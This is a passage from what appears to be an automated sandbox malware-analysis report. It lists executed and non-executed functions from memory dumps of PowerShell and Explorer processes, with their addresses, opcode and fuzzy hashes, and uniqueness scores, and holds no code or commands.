Executed Functions

Function 00007FFE7E1EE5BC Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1522381757.00007FFE7E1ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b83bf6deafbd4057e2cbd13d966771b958c12d7b021d39ac7a6dbbcc68f8a23
Instruction ID: e2999a075d0083c4d8738a9a5285cdafc8c033cabf0632fa53581c12055c4a2a
Opcode Fuzzy Hash: 1b83bf6deafbd4057e2cbd13d966771b958c12d7b021d39ac7a6dbbcc68f8a23
Instruction Fuzzy Hash: D6114F3151CF088FDB98EF1DE485A5277E0FB98321B10465FE459C7666D731E881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1523120651.00007FFE7E300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: f3dba33f47120b771e937863b1adddf688ab681ae473e292cc7a9c8d87a7e299
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 1901677111CB0C4FD744EF0CE451AB5B7E0FB95364F10056EE58AC36A5DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D4151 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1524322177.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a88e4ad8cd7a39f22e397522f91eda928e41154a89e0249a3735d1202c91e7
Instruction ID: b53d811582e28c5311d9387808dc044434d952a147103f95d05cdef80ad16795
Opcode Fuzzy Hash: 01a88e4ad8cd7a39f22e397522f91eda928e41154a89e0249a3735d1202c91e7
Instruction Fuzzy Hash: 4EF05E32A0C5459FE665EB4CE9518A877E0EF55330B1901F7D19DC7673DA29EC418780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D4404 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1524322177.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aead87ceed94b2b53c98c83949ec87442dd2cacffd10bf83187b21ac71af96c6
Instruction ID: b88b8fd241f56860bd2cf034b66fddff4280a587cedf742c4d5a604fc812cb36
Opcode Fuzzy Hash: aead87ceed94b2b53c98c83949ec87442dd2cacffd10bf83187b21ac71af96c6
Instruction Fuzzy Hash: 75F0823294C5448FEB55EB4CE8558A877F0FF4532075500F7D199C7563E629AC91C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D6865 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1524322177.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66289f946582aac448da39bcd387507156da7317d9c3db3d6d4760a0343a00f
Instruction ID: 305e3e9cf647ccfa32e1ace1d17d5e3d984b875bc85bc24a3d6560c11f239638
Opcode Fuzzy Hash: e66289f946582aac448da39bcd387507156da7317d9c3db3d6d4760a0343a00f
Instruction Fuzzy Hash: 30E09232A0E6484FEB55EAA854451ECBFA0DB59321F1800BFD04DD2553ED295441C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E306620 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1523120651.00007FFE7E300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea98a2c235e1bad7dd78a0884fab3a46e514b6754d59e3bab6bb764ec973470
Instruction ID: 361a459920f2e8e137244b2592f25e348ef9b912a4dc11b904f27eeadd3b0b77
Opcode Fuzzy Hash: 2ea98a2c235e1bad7dd78a0884fab3a46e514b6754d59e3bab6bb764ec973470
Instruction Fuzzy Hash: 00E0BF3541494C9F8B44EF18D4099E977A0FB68305B01465BB41DD7160DB35A954CBC2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFE7E308BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

O_^K, xrefs: 00007FFE7E308C6A
O_^<, xrefs: 00007FFE7E308C12
O_^Y, xrefs: 00007FFE7E308CBA
O_^?, xrefs: 00007FFE7E308C2A
O_^8, xrefs: 00007FFE7E308BF2
O_^N, xrefs: 00007FFE7E308C72
O_^Q, xrefs: 00007FFE7E308C8A
O_^J, xrefs: 00007FFE7E308C62

Memory Dump Source

Source File: 00000008.00000002.1523120651.00007FFE7E300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe7e300000_powershell.jbxd

Similarity

API ID:
String ID: O_^8$O_^<$O_^?$O_^J$O_^K$O_^N$O_^Q$O_^Y
API String ID: 0-3814653101
Opcode ID: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
Instruction ID: ad634037bc13c16563d0653f95ce7f44b7e3b8748f7ee60da1a82823401cbac8
Opcode Fuzzy Hash: 049ef812df7fd761601f28dd96fc4d10cb6a864f10ec31d3fde299ba9228c6b6
Instruction Fuzzy Hash: E4210477A559158AD252367DB8419EC7784DF9477A34901F3E02DCF723ED18A48B8680

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7076, Parent PID: 1320COMMON

Executed Functions

Function 00007FFE7E30B238 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f9c12819b775ec34df8a8abd659944fc7af8b110bf56aa7129b820e6f1c190
Instruction ID: 8d52fd69777fb0a55ce8c9eb0951c852551090e7ac9e239afa5baf3a9c40fb5c
Opcode Fuzzy Hash: b4f9c12819b775ec34df8a8abd659944fc7af8b110bf56aa7129b820e6f1c190
Instruction Fuzzy Hash: F2815B3092CA8C8FE759EF18C4957B9BBE1FF55311F1401BED08AC36A7DA24A846CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E30B38C Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e57c26f6a6bf8b4b9772208f383ac9dd12030865aac5f395fc114477ca9ee5b
Instruction ID: 117a8109471055af9a70b8862c31537b3b243d663f76be62beddc429ed14127e
Opcode Fuzzy Hash: 5e57c26f6a6bf8b4b9772208f383ac9dd12030865aac5f395fc114477ca9ee5b
Instruction Fuzzy Hash: 6331453191CB888FEB59DB6C98457F97BE1EB96321F04417FD088C3166DA34A80ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E30978A Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e674c7b9279b1d5d2af69a6c34a76e279de409737a2505333a2cb2f06fa11da8
Instruction ID: 2a23f9d7acfec30f0a073790d465e13060aed9b31c088f9b42218ecdf343eb10
Opcode Fuzzy Hash: e674c7b9279b1d5d2af69a6c34a76e279de409737a2505333a2cb2f06fa11da8
Instruction Fuzzy Hash: BB31B13191CB4C9FDB58DB4CA80AAB97BE0FB98721F00422FE449D3251CB71A8558BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E1EE77C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1709794693.00007FFE7E1ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E1ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e1ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc521316c6c8cd1a3329c92746f3d993a0945a21d5cbfffd3f2a1c9a1c61f48
Instruction ID: 3be692ca9ebf10412a5565a8b789d9f29d4392ecd12b761481b12123c6189343
Opcode Fuzzy Hash: 7cc521316c6c8cd1a3329c92746f3d993a0945a21d5cbfffd3f2a1c9a1c61f48
Instruction Fuzzy Hash: AB11913150CF088F9BA8EF1DE48595637E0FB98321B10465FE459C7266D730E881CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: f3dba33f47120b771e937863b1adddf688ab681ae473e292cc7a9c8d87a7e299
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 1901677111CB0C4FD744EF0CE451AB5B7E0FB95364F10056EE58AC36A5DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D4151 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711997278.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a88e4ad8cd7a39f22e397522f91eda928e41154a89e0249a3735d1202c91e7
Instruction ID: b53d811582e28c5311d9387808dc044434d952a147103f95d05cdef80ad16795
Opcode Fuzzy Hash: 01a88e4ad8cd7a39f22e397522f91eda928e41154a89e0249a3735d1202c91e7
Instruction Fuzzy Hash: 4EF05E32A0C5459FE665EB4CE9518A877E0EF55330B1901F7D19DC7673DA29EC418780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D4404 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711997278.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b663a111bb333907370f3afc0d96c32e4223575bf098bfd898e9aa8245f8dd
Instruction ID: 8e249543f806f1628868bb5368eecf3d6ea96c8c4f251319877440020426bd40
Opcode Fuzzy Hash: 20b663a111bb333907370f3afc0d96c32e4223575bf098bfd898e9aa8245f8dd
Instruction Fuzzy Hash: 05F0A032A1C5848FEB95DB0CD8448A877F0FF4533078500F7D199CB162E629EC91C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E30A0E8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06395f0784c178ad9931043b9027c5c30da56162a3fa46dde6ddbb88fe0c91c
Instruction ID: 745170de5708dea2ed7cff44ad0ee19c29a536fb0c8d7dcb5daec9ff0ad4e375
Opcode Fuzzy Hash: f06395f0784c178ad9931043b9027c5c30da56162a3fa46dde6ddbb88fe0c91c
Instruction Fuzzy Hash: 11F08236858A8D4FDB45EF28A8594E97BA0FF25204B0401ABE45DC7072EA259648CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D6865 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711997278.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66289f946582aac448da39bcd387507156da7317d9c3db3d6d4760a0343a00f
Instruction ID: 305e3e9cf647ccfa32e1ace1d17d5e3d984b875bc85bc24a3d6560c11f239638
Opcode Fuzzy Hash: e66289f946582aac448da39bcd387507156da7317d9c3db3d6d4760a0343a00f
Instruction Fuzzy Hash: 30E09232A0E6484FEB55EAA854451ECBFA0DB59321F1800BFD04DD2553ED295441C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3D427E Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711997278.00007FFE7E3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e3d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 410cab9e6a60b66455ddbf649cb52f942b98b5d06610ec6ac1bc66db77e141bd
Instruction ID: f2c098c5d574035fd5cf6ae1c165fa8a3c3f6d2c8724f03f427bfededdd9ebcc
Opcode Fuzzy Hash: 410cab9e6a60b66455ddbf649cb52f942b98b5d06610ec6ac1bc66db77e141bd
Instruction Fuzzy Hash: B6E01A32A5C0048FEA55EA48E4458E873F1FF44325B9500B2D19ACB422D626E890C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E306620 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95cd548828093aaa54af768387e3343cb1328d7c4a6eae186b4bd34d95cb055
Instruction ID: 7112cbaabce5bfd6813e5b3eaafcf604f2b42fd5ac6af005dc463b1a8306937b
Opcode Fuzzy Hash: c95cd548828093aaa54af768387e3343cb1328d7c4a6eae186b4bd34d95cb055
Instruction Fuzzy Hash: C5E0EC35814A4C9F8B48EF18E8099FA77E0FB68305B11465BF81ED7170DB71AA58CBC2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFE7E308BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

O_^J, xrefs: 00007FFE7E308C8A
O_^F, xrefs: 00007FFE7E308C7A
O_^4, xrefs: 00007FFE7E308BFA
O_^7, xrefs: 00007FFE7E308C12

Memory Dump Source

Source File: 0000000B.00000002.1711000494.00007FFE7E305000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E305000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffe7e305000_powershell.jbxd

Similarity

API ID:
String ID: O_^4$O_^7$O_^F$O_^J
API String ID: 0-875994666
Opcode ID: da09b5b55e6a0fa5fe5309612000c817787d445477060b8cf0dfc845e2f75349
Instruction ID: 6049b5b2ed420dc0e42c7bd6e5c446038abc701d03ecafaf01ca2e71d69061d2
Opcode Fuzzy Hash: da09b5b55e6a0fa5fe5309612000c817787d445477060b8cf0dfc845e2f75349
Instruction Fuzzy Hash: F42104BB61982ADED2527B7DB8049ED3744CFD423634902B3D19E8F753E914708A8A90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3572, Parent PID: 1320COMMON

Executed Functions

Function 00007FFE7E20EE9C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2008903158.00007FFE7E20D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E20D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e20d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b2b18e819ca153b3bd0ef0b37a7a54acec420d2f4c960c8df265341b3d308a
Instruction ID: 0035a8385845edeef9523b99ee5177b28bbc6582da16272c356979bd2ed977da
Opcode Fuzzy Hash: e4b2b18e819ca153b3bd0ef0b37a7a54acec420d2f4c960c8df265341b3d308a
Instruction Fuzzy Hash: D111513151CF088F9BA8EF1DE4899667BE0FB98320B10466FD459C7666D731E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3233B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2010520204.00007FFE7E320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e320000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: a0602a18edce9f4b4b570abe7e8ba2a8ad273282f0a77d9cfc6425653aa3b05f
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 9E01677111CB0D4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3F4151 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2011825694.00007FFE7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954533c21a7b236e2d2e50781bb7ff6d10b20f6fd8e67683ad5112a615ab3ced
Instruction ID: 6257a581df3014cfa201505620e4d74285d6b1f161e70b78e61ec37469854d94
Opcode Fuzzy Hash: 954533c21a7b236e2d2e50781bb7ff6d10b20f6fd8e67683ad5112a615ab3ced
Instruction Fuzzy Hash: E6F05E32A0C5458FE769EB4CE5518A877E0EF5533071501B7D15DC7673DB29EC418780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3F4404 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2011825694.00007FFE7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3898080ab89934edd1660bf3e3f57f50a0d8db5b3791e13e41d239b7503b3f27
Instruction ID: 869952878d7fd87a92e75b0b2da522a87607bc9585799ee675b5582f21d1ff33
Opcode Fuzzy Hash: 3898080ab89934edd1660bf3e3f57f50a0d8db5b3791e13e41d239b7503b3f27
Instruction Fuzzy Hash: 3EF08C32A0C5448FEB68EB0CE4518A877E0FF45320B9A00B7E199DB573EB2AAC41C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E3F6865 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2011825694.00007FFE7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750b97d1e292995cac9f06415bf045e9955364ea08f2724a862d87e26e1633cf
Instruction ID: 8cd15cc33720270b41c542e0d8823a246a1bc88c1463e1443d3c2156af9f6000
Opcode Fuzzy Hash: 750b97d1e292995cac9f06415bf045e9955364ea08f2724a862d87e26e1633cf
Instruction Fuzzy Hash: BBE09232E0E6484FEB55EAA854451ECBFA0DB59221F1800BFD04DD2553ED295441C354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E326620 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2010520204.00007FFE7E320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e320000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c933ec2c04c66561989c5bb7c05da5e19546a13c4a4ab67977af8bb91e6523
Instruction ID: 570a95de988c576649a553a4b09c711d96738b461eff2f79cd637302a4bc82c8
Opcode Fuzzy Hash: b1c933ec2c04c66561989c5bb7c05da5e19546a13c4a4ab67977af8bb91e6523
Instruction Fuzzy Hash: C6E08C31814A0C8F8B44EF18D8099EA77E0FB28305F00025BF81EC3130DB31AA58CBC2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFE7E328BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^?, xrefs: 00007FFE7E328C2A
M_^J, xrefs: 00007FFE7E328C62
M_^N, xrefs: 00007FFE7E328C72
M_^Q, xrefs: 00007FFE7E328C8A
M_^Y, xrefs: 00007FFE7E328CBA
M_^<, xrefs: 00007FFE7E328C12
M_^8, xrefs: 00007FFE7E328BF2
M_^K, xrefs: 00007FFE7E328C6A

Memory Dump Source

Source File: 0000000D.00000002.2010520204.00007FFE7E320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffe7e320000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
Instruction ID: 1279f74edb0f2c394299e95daaaed52960e5af855080855a09b801b85c69c528
Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
Instruction Fuzzy Hash: E421D777654929CAD252366CB8419EC7784DF5437938A03F3E068CF663FD1864878A81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 2884, Parent PID: 1060COMMON

Executed Functions

Function 00007FFE7E341329 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d641ff93202e7c7622197c1153b9ac1cce1f415e9577030050f3e17acd589198
Instruction ID: 70cb67c05f9eb17e1f0f0be8e7ac3f5489a1f27c17d677805e58dfaef8c7d021
Opcode Fuzzy Hash: d641ff93202e7c7622197c1153b9ac1cce1f415e9577030050f3e17acd589198
Instruction Fuzzy Hash: D8614475B6860D5FDB98FB7C946D6FD7AB5FF89200B800879E40ED3292FD2898118B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E34088F Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038f17fd6dd6abb95160ce9a0e3fb4e297479f49d2f4ce5a76d52634244cfaf3
Instruction ID: 41b2f597224c0f520f91e8962548eb4a208518325d9c2b6f613a5328294d0631
Opcode Fuzzy Hash: 038f17fd6dd6abb95160ce9a0e3fb4e297479f49d2f4ce5a76d52634244cfaf3
Instruction Fuzzy Hash: 4F31907E79450E4BD379FB1C90956FD7E72FB8C200B948465E409D3B9AEE30AA208781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E340A19 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898cf28b4528d7aac39196b02f335c5c47193e7751e47cbc33f4081058f562a9
Instruction ID: 6ff671eb7ff6ea21d89ee6a6416014acce062b564f8440ae69e90c39ab9a10a8
Opcode Fuzzy Hash: 898cf28b4528d7aac39196b02f335c5c47193e7751e47cbc33f4081058f562a9
Instruction Fuzzy Hash: 5C11B631E1990E5FDB58FB7CC4556FD7BF1EF98201B540479D009D72A6DD3898428780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E340B7A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de0bd5231dcd3c2848145b38ee2cb384a3efc3dce5eb942e0afe76b8faca7272
Instruction ID: 4008ff54bbce2e355a6b847304625f180abacdff81f643d0ae186f9cc0c5437d
Opcode Fuzzy Hash: de0bd5231dcd3c2848145b38ee2cb384a3efc3dce5eb942e0afe76b8faca7272
Instruction Fuzzy Hash: 81F0B415B689168BF29173BC841E37C32DADF98704F28423BE409C37E3ED18E8028792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E340C14 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4b804f131faf083afc80b984320c855da91010f4c600161ff5f308e48a79d3
Instruction ID: e40df8c59d3e9890bb852e66eef4a1c4aba0d1e5e1522d312f387005b6c64a5b
Opcode Fuzzy Hash: 7f4b804f131faf083afc80b984320c855da91010f4c600161ff5f308e48a79d3
Instruction Fuzzy Hash: F9E06525B1490A4FEF41BBAC94892FCB3D2EF9C211F54007BE50DD3272DE2894428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E340CE1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d76d5c16741752181480a3753b20bca23c676bda1374b3ddb8bf650fbd652ae
Instruction ID: c1852f8966ac9127569fdbfbb12c1012b543bf954eb95865c1477427d817d421
Opcode Fuzzy Hash: 6d76d5c16741752181480a3753b20bca23c676bda1374b3ddb8bf650fbd652ae
Instruction Fuzzy Hash: D3E06521B45C590FA6D1FA3C44586BC23C2DB9928172900B6D40DC72B2ED149C438780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE7E341FB0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2092439246.00007FFE7E340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffe7e340000_explorer.jbxd

Similarity

API ID:
String ID:
